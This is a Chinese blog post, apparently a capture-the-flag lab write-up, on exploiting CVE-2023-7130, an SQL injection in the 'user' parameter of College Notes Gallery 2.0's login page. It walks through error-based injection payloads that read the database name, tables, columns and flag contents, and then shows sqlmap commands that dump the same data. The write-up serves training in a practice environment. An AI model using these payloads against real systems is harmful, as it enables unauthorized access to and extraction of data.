春秋云境CVE-2023-7130

最新推荐文章于 2024-05-12 15:58:43 发布
最新推荐文章于 2024-05-12 15:58:43 发布
阅读量412 收藏 10
点赞数 5
分类专栏: 春秋云境 文章标签: 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/137126308
版权

简介

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

正文

这关有我用了两种办法,第一种是用报错注入进行手注,第二种就是sqlmap

首先进入靶场我们就可以看到有个login登录的按键,直接点进去。

第一种,报错注入

进入登录界面那就直接开始测试,我们进来就看到这里有个报错,那么就很明显的知道这里可以用报错注入。那么就开始测闭合,发现是单引号闭合。

爆数据库名

1'+and+(extractvalue(1,concat(0x7e,(select+database()),0x7e)))=1--+

爆表名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema='notes'),0x7e)))=1--+

爆列名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_schema='notes'+and+table_name='flllaaaag'),0x7e)))=1--+

爆内容

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(flag)from+flllaaaag),0x7e)))=1--+

注意

这里因为报错注入输出是有限制长度的,所以我们需要用截断函数来把后面的的内容显示出来。

1'+and+(extractvalue(1,concat(0x7e,substr((select+group_concat(flag)from+flllaaaag),20,40),0x7e)))=1--+

第二种方式sqlmap

爆库名

python sqlmap.py -r 2.txt -batch -dbs

爆表名

python sqlmap.py -r 2.txt -batch -D notes -tables

爆列名

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns

爆数据

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump

是花花呢
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋CVE-2023-27372
m0_64432806的博客
03-16 473
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。
春秋CVE-2023-1313
m0_64432806的博客
03-27 480
春秋CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
春秋-CVE-2020-17530
qq_63265389的博客
04-15 321
CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。当对标签属性中的原始用户输入进行评估时,强制 OGNL 评估可能会导致远程代码执行。找一下poc nothing很烦有了Apache Struts 框架在强制时,会对分配给某些标签属性(如 id)的属性值执行双重评估。因此,可以将一个值传递给 Struts,该值将在呈现标签的属性时再次评估。通过精心构建的请求,这可能会导致远程代码执行。
春秋CVE-2022-25401
suran0403的博客
04-06 247
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞。
春秋CVE-2022-24112
一只爱吃橙子的羊
12-04 2173
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋CVE-2022-30887
一只爱吃橙子的羊
11-29 3861
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋 CVE-2019-13086
HMX404的博客
01-28 221
CVE-2019-13086 POC,RUN一下就出来了,不需要思考原理,我也不知道原理。替换你的靶场URL,
春秋CVE-2022-28060
一只爱吃橙子的羊
11-29 2341
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋CVE-2023-52064
shr592833253的博客
04-08 552
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
CVE-2023-25157-main(1).zip
07-19
复现GeoServer CVE-2023-25157 SQL注入
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 360
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
简述redis数据类型及应用场景
qq_45927587的博客
05-10 287
每种数据类型的选择应当基于具体的应用需求,比如是否需要排序、是否允许重复元素、是否需要执行集合运算等。Redis作为一种高性能的内存数据存储系统,提供了多种数据结构来满足不同场景下的需求。: 双向链表,可以做栈(LPOP/RPOP)、队列(LPUSH/RPOP)或实现发布/订阅模式。: 最基本的数据类型,可以存储字符串、整数或者浮点数等数据。支持原子性操作,如增、删、改、查。: 无序且不重复的字符串集合,支持集合运算如并集、交集、差集。: 用于存储键值对的集合,每个哈希可以存储多个字段-值对。
Linux——综合实验
Xinan_____的博客
05-07 840
> MASTER_HOST='wangA.wld.com', //主节。赋予root用户replication slave 权限。编辑一个数据库连接脚本,测试数据库是否能正常连接。创建共享目录/share_nfs。编辑nfs配置文件 设置允许ip。2.7.1.存在53端口占用。编辑自动挂载父目录配置文件。编辑自动挂载父目录配置文件。编辑自动挂载子目录配置文件。创建一个用户用来做主从同步。从节点同步主节点二进制文件。创建一个只做nfs的用户。解决办法:停止其他端口。为我们的应用创建一个库。
商场学习之微服务
最新发布
weixin_47628141的博客
05-12 608
搭建商场项目基本架构和curd,并配置基本的微服务功能
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值